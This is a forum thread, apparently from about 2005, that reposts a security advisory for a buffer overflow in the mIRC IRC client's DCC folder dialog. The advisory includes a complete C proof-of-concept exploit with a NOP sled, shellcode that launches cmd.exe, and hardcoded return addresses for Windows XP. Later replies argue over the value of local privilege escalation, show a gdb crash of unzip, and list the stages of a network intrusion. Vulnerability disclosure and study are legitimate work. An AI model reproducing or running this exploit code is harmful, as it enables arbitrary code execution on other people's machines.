mIRC Exploit Found

[deadly7]

- 1 - Introduction

Written by Khaled Mardam-Bey, mIRC is a friendly IRC client that is
well equipped with options and tools.

- 2 - Vulnerability description

Tested on mIRC 6.16,6.12,6.03 and 5.91, all result vulnerable.
Possibly all mIRC versions are vulnerable.
The code executed are with current user privileges,anyway this bug
could be dangerous in universities,
cyber coffees, schools and any location with restrictions.
Adding/editing filters to locate the specified folder for the files
transfered by DCC if insert a string greater
or equal to 981 bytes the application crash showing an memory error 0x0000.
This 0x0000 error it's because shows the value of the second edit
field and it's empty, if write AAAA in this field,
the error it's 0x41414141, overwrite the eip and can take the control
to execute arbitrary code.
To execute code appears a little problem, only can write 39chars in
the second edit, this problem imposibilite insert
a good shellcode, to fix this, can put jmp esp + sub esp 0x74 + jmp
esp, with this, the EIP it's overwrited by the text
in the first edit field, and in this have 980bytes for the shellcode.

- 3 - How to exploit it

This PoC open a cmd.exe,also it's possible execute any other code.

----------- CUT HERE ----------------------
/*
mIRCexploitXPSP2eng.c
Vulnerability tested on Windows XP SP1,SP2 Spanish
and Windows XP SP2 English

This PoC it's for XP SP2 English, for spanish readers:

XP SP1
system: 0x77bf8044
jmp esp: 0x77E29BBB (advapi32.dll)

XP SP2
system: 0x77bf93c7
jmp esp: 0x77E37BBB (advapi32.dll)

Special thanks to rojodos (very great your tutorial),
jocanor, otromasf, crazyking and gandalfj.
*/

#include <stdio.h>
#include <stdlib.h>
#include <windows.h>

int main () {
HWND lHandle, lHandledit, lHandledit2;
char strClass[30];
char shellcode[999]=
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x55"
"\x8B\xEC"
"\x33\xFF"
"\x57"
"\x83\xEC\x04"
"\xC6\x45\xF8\x63"
"\xC6\x45\xF9\x6D"
"\xC6\x45\xFA\x64"
"\xC6\x45\xFB\x2E"
"\xC6\x45\xFC\x65"
"\xC6\x45\xFD\x78"
"\xC6\x45\xFE\x65"
"\x8D\x45\xF8"
"\x50"
"\xBB\xc7\x93\xc2\x77"
"\xFF\xD3"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90";

//Shellcode system("cmd.exe"), system in \xc7\x93\xc2\x77 77c293c7
(WinXP Sp2 English)

char saltaoffset[]="\xD6\xD1\xE5\x77\x90\x90\x90\x90\x90\x83\xEC\x74\xFF\xE4\x90\x90";
// jmp esp 0x77E5D1D6 (advapi32.dll) , sub esp 0x74, jmp esp

lHandle=FindWindow(NULL, "DCC Get Folder");

if (!lHandle)
{
printf("\nCan't find mIRC DCC Get Folder Dialog :\nIn mIRC
Options/DCC/Folders push ADD\n");
return 0;
}
else
{ printf("handle for mIRC DCC Get Folder Dialog : 0x%X\n",lHandle); }

SetForegroundWindow(lHandle);
lHandledit = FindWindowEx(lHandle, 0, "Edit", 0);
printf("handle for First Edit : 0x%X\n",lHandledit);
printf("ASCII Shellcode in first edit : %s\n", shellcode);
SendMessage(lHandledit, WM_SETTEXT,0,(LPARAM)shellcode);


lHandledit2 = GetWindow(lHandledit, GW_HWNDNEXT);
GetClassName(lHandledit2, strClass, sizeof(strClass));

while ( lstrcmp(strClass,"Edit") )
{
lHandledit2 = GetWindow(lHandledit2, GW_HWNDNEXT);
GetClassName(lHandledit2, strClass, sizeof(strClass));
}

printf("handle for Second Edit : 0x%X\n",lHandledit2);
Sleep(500);
printf("ASCII Shellcode in second edit : %s\n", saltaoffset);
SendMessage(lHandledit2, WM_SETTEXT,0,(LPARAM)saltaoffset);
Sleep(500);
SendMessage (lHandledit2, WM_IME_KEYDOWN, VK_RETURN, 0);
}

----------- CUT HERE ----------------------


- 4 - Solution

I contacted with khaled in khaled@mirc.com reporting the bug on
29/11/2005 without response.
Contacting again with this advisory.


- 5 - Credits

URL Vendor: www.mirc.com
Author: Jordi Corrales ( crowdat[at]gmail.com )
Date: 09/12/2005

Spanish and English Advisory: http://www.shellsec.net/leer_advisory.php?id=9
Spanish Advisory and Compiled Spanish Exploit:
http://www.cyruxnet.org/mirc616_bug_exploit.htm

--------------
That's neat that someone figured out how to do that. I wouldn't be smart enough to program in assembly (that's what it looks like to me, stfu!) for a couple years.  Mainly because I have no drive.

[zorm]

At first I thought this might be something neat and then i realized its a local exploit and totally lame.

[Quik]

At first I thought this might be something neat and then i realized its a local exploit and totally lame.

Yeah, I looked at this and that was exactly my thoughts.

"WHAT THE FUCK PURPOSE CAN THIS SERVE?!"

Local priviledge escalation is not cool, especially on Windows.

[mynameistmp]

At first I thought this might be something neat and then i realized its a local exploit and totally lame.

Yeah, I looked at this and that was exactly my thoughts.

"WHAT THE FUCK PURPOSE CAN THIS SERVE?!"

Local priviledge escalation is not cool, especially on Windows.

Local privilege* escalation is more important than you may think.

[Quik]

At first I thought this might be something neat and then i realized its a local exploit and totally lame.

Yeah, I looked at this and that was exactly my thoughts.

"WHAT THE FUCK PURPOSE CAN THIS SERVE?!"

Local priviledge escalation is not cool, especially on Windows.

Local privilege* escalation is more important than you may think.

I'm sorry if I can't spell.

Yes, it's interesting on Linux, but when there are issues on Windows that allow you to get admin accounts by just sitting down at a computer, even on XP, that have been unpatched for a while now, this one limited thing isn't all that special. Remember, mIRC can't run on Linux.

[iago]

At first I thought this might be something neat and then i realized its a local exploit and totally lame.

Yeah, I looked at this and that was exactly my thoughts.

"WHAT THE FUCK PURPOSE CAN THIS SERVE?!"

Local priviledge escalation is not cool, especially on Windows.

Local privilege* escalation is more important than you may think.

Why would mIRC be running on windows with Adminstrative privileges while being used by a user that doesnt' have admin?  It would only make sense if it was a set-uid program..

[mynameistmp]

At first I thought this might be something neat and then i realized its a local exploit and totally lame.

Yeah, I looked at this and that was exactly my thoughts.

"WHAT THE FUCK PURPOSE CAN THIS SERVE?!"

Local priviledge escalation is not cool, especially on Windows.

Local privilege* escalation is more important than you may think.

Why would mIRC be running on windows with Adminstrative privileges while being used by a user that doesnt' have admin?  It would only make sense if it was a set-uid program..

Wether this particular exploit is useful or not, I don't know. I'm saying local privilege escalation, regardless of OS, _is_ "cool".

[Quik]

At first I thought this might be something neat and then i realized its a local exploit and totally lame.

Yeah, I looked at this and that was exactly my thoughts.

"WHAT THE FUCK PURPOSE CAN THIS SERVE?!"

Local priviledge escalation is not cool, especially on Windows.

Local privilege* escalation is more important than you may think.

Why would mIRC be running on windows with Adminstrative privileges while being used by a user that doesnt' have admin?  It would only make sense if it was a set-uid program..

Wether this particular exploit is useful or not, I don't know. I'm saying local privilege escalation, regardless of OS, _is_ "cool".

You're not "cool".

I agree, although perhaps not with the "regardless of OS" comment.

[iago]

Wether this particular exploit is useful or not, I don't know. I'm saying local privilege escalation, regardless of OS, _is_ "cool".

All right, then I fully agree.  This exploit does seem useless, it's just like the old unzip exploit:

iago@slayer:~$ gdb -q unzip
(no debugging symbols found)...Using host libthread_db library "/lib/tls/libthread_db.so.1".
(gdb) run `perl -e 'print "A"x50000'`
Starting program: /usr/bin/unzip `perl -e 'print "A"x50000'`
(no debugging symbols found)...(no debugging symbols found)...
Program received signal SIGSEGV, Segmentation fault.
0x41414141 in ?? ()

Sure, I can overflow unzip locally, but who cares?  I could even very easily write exploit code for it, but again, there's no reason to. 

But you're absolutely correct, local privilege elevation is a very important step if you're exploiting somebody. 

[Quik]

But you're absolutely correct, local privilege elevation is a very important step if you're exploiting somebody. 

wtf? of course it is, it's the entire point.

[iago]

But you're absolutely correct, local privilege elevation is a very important step if you're exploiting somebody. 

wtf? of course it is, it's the entire point.

No, getting the ability to install/run a particular program is the entire point.  The program may or may not require root privileges.  There are many steps to it:

- Footprinting the network, finding a way in
- Finding the server you need
- Finding a vulnerability in the exterior of the server
- Finding a privilege escalation vulnerability, if necessary
- Stealing the file/information/planting a file to prove you were there/etc.

It's just one part.  The goal can, of course, vary a lot. 

[Quik]

But you're absolutely correct, local privilege elevation is a very important step if you're exploiting somebody. 

wtf? of course it is, it's the entire point.

No, getting the ability to install/run a particular program is the entire point.  The program may or may not require root privileges.  There are many steps to it:

- Footprinting the network, finding a way in
- Finding the server you need
- Finding a vulnerability in the exterior of the server
- Finding a privilege escalation vulnerability, if necessary
- Stealing the file/information/planting a file to prove you were there/etc.

It's just one part.  The goal can, of course, vary a lot. 

But it's usually the main objective, hence the term "rooting" being popular.

[iago]

But it's usually the main objective, hence the term "rooting" being popular.

The objective is frequently to deface a website.  Root isn't required for that.

The object is also frequently to steal information.  Root also isn't required for that. 

The point is, it's not always the objective.  It depends on what you're actually doing.  "rooting" is an over-used word.

[ink]

this could possibly be useful if you found a computer that had maybe default realvnc or radmin password set except the user that is logged in at the time doesn't have full admin access

... wait this is for mIRC, wtf